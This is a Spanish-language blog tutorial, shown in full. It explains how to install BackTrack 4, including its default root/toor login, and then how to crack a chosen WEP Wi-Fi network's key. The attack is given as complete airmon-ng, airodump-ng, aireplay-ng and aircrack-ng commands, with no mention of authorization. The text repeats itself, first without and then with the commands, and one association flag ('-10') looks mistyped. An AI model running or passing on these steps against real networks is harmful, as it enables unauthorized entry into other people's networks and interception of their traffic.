Primero decirles que el Backtrack lo tengo instalado como S.O., no lo uso como live... ehmm aprovechemos de ver como se instala ok? asi dejamos el tuto completo.
Bajamos la imagen del Backtrack 4
Descarga
DESCARGA
una vez quemada la imagen en un DVD reiniciamos y corremos la pc desde el cd-rom
cuando ya halla arrancado tipeamos
nos llevara a la interfaz grafica de kde.
En el escritorio hacemos click en
En el mapa ubicamos Chile y le damos click a "forward".
Ahora configuran el particionado, yo lo hice manual ya que tengo las particiones echas de antes, en el caso que deseen usar todo el disco para backtrack (lo dudo) eligen Guided - use entire disk, pero recomiendo que usen una particion especifica ok.
Aceptan el sumario y listo.
PD- cuando esten en el particionado no olviden que deben elejir ext3 y no boot ni home sino /
ok, reinician y acceden a Backtrack, se logean :
para cambiar la contraseña entonces en una terminal ponen
y escriben la nueva contraseña.
seguimos, ahora vamos a ver el asunto de las WEP.
En una terminal tecleamos
en mi caso sale "wlan0" por lo tanto la pondre en modo monitor asi :
(Abrimos una nueva terminal)
El modo monitor saldra en mon0 asi q vamos a trabajar en ese.
Escaneamos la red (en la misma terminal)
Una vez terminado el scan de redes elejimos la que vamos a sacar la WEP y anotamos el BSSID y canal de la RED. para cancelar el scan presionan ctrl+c.
En una nueva terminal vamos a capturar beacons y paquetes de datos, asi que tecleamos :
PD- las xx:xx: es la BSSID de la red, la que anotaron antes y el 11 es el canal.
cuando tengamos minimo 35.000 paquete de datos (+- 3 minutos) podemos parar el proceso con ctrl+c
Ahora nos vamos a asociar con la RED, en una nueva terminal tecleamos :
PD- nuevamente : xx:xx:xx es la BSSID de la red, esto lo podemos hacer incluso mientras se capturan paquetes, no es necesario esperar los 35.000
En la misma terminal vamos a abrir y leer los paquetes capturados :
Cuando tengamos el minimo de 35.000 paquetes de datos capturados y leidos crackeamos la contraseña WEP, en la terminal tecleamos :
buscamos el fichero .cap en mi caso es wep-01.cap y en una nueva terminal tecleamos :
Comenzara a crackear la contraseña WEP y nos la dira.
eso es todo. dudas aqui. salu2
una vez quemada la imagen en un DVD reiniciamos y corremos la pc desde el cd-rom
cuando ya halla arrancado tipeamos
Código:
startx
En el escritorio hacemos click en
Código:
install.sh
Ahora configuran el particionado, yo lo hice manual ya que tengo las particiones echas de antes, en el caso que deseen usar todo el disco para backtrack (lo dudo) eligen Guided - use entire disk, pero recomiendo que usen una particion especifica ok.
Aceptan el sumario y listo.
PD- cuando esten en el particionado no olviden que deben elejir ext3 y no boot ni home sino /
ok, reinician y acceden a Backtrack, se logean :
Código:
root
Código:
toor
Código:
passwd
seguimos, ahora vamos a ver el asunto de las WEP.
En una terminal tecleamos
Código:
iwconfig
 | Esta imagen esta redimensionada. Click aqui para verla full. El tamaño original es 631x281. |
en mi caso sale "wlan0" por lo tanto la pondre en modo monitor asi :
(Abrimos una nueva terminal)
Código:
airmon-ng start wlan0
El modo monitor saldra en mon0 asi q vamos a trabajar en ese.
Escaneamos la red (en la misma terminal)
Código:
airodump-ng mon0
| Esta imagen esta redimensionada. Click aqui para verla full. El tamaño original es 641x363. |
Una vez terminado el scan de redes elejimos la que vamos a sacar la WEP y anotamos el BSSID y canal de la RED. para cancelar el scan presionan ctrl+c.
En una nueva terminal vamos a capturar beacons y paquetes de datos, asi que tecleamos :
Código:
airodump-ng -w wep -c 11 --bssid xx:xx:xx:xx:xx:xx mon0
| Esta imagen esta redimensionada. Click aqui para verla full. El tamaño original es 709x197. |
cuando tengamos minimo 35.000 paquete de datos (+- 3 minutos) podemos parar el proceso con ctrl+c
Ahora nos vamos a asociar con la RED, en una nueva terminal tecleamos :
Código:
aireplay-ng -10 -a xx:xx:xx:xx:xx:xx mon0
| Esta imagen esta redimensionada. Click aqui para verla full. El tamaño original es 613x189. |
En la misma terminal vamos a abrir y leer los paquetes capturados :
Código:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0
| Esta imagen esta redimensionada. Click aqui para verla full. El tamaño original es 672x329. |
Cuando tengamos el minimo de 35.000 paquetes de datos capturados y leidos crackeamos la contraseña WEP, en la terminal tecleamos :
Código:
dir
Código:
aircrack-ng archivo.cap
Comenzara a crackear la contraseña WEP y nos la dira.
eso es todo. dudas aqui. salu2
0 comentarios:
Publicar un comentario